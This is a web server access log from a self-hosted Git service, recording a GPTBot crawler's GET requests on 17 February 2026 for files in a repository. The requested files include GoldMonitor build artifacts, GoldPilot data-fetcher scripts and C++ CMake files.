"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:14:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 2814854] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:14:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 2813127] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:14:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 2813156] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:14:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:14:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 9871] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:14:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 151805] [Gzip 30.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:14:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 153547] [Gzip 31.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:14:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 153571] [Gzip 31.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:14:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 151777] [Gzip 30.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:14:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 153789] [Gzip 31.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:14:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 151811] [Gzip 30.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:14:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 12556] [Gzip 5.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:14:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 12459] [Gzip 3.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" +[17/Feb/2026:14:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 12488] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" +[17/Feb/2026:14:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11113] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" +[17/Feb/2026:14:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 10624] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" +[17/Feb/2026:14:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" +[17/Feb/2026:14:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11670] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" +[17/Feb/2026:14:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 13031] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" +[17/Feb/2026:14:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10190] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" +[17/Feb/2026:14:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:14:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10772] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:14:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:14:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13348] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" +[17/Feb/2026:14:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 108760] [Gzip 18.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19492] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" +[17/Feb/2026:14:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 10890] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" +[17/Feb/2026:14:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 9885] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:14:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 9868] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" +[17/Feb/2026:14:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 1494] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:14:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13480] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:14:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:14:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 2813995] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:14:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 153759] [Gzip 31.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:14:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 11771] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:14:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 12526] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:14:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:14:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 11804] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 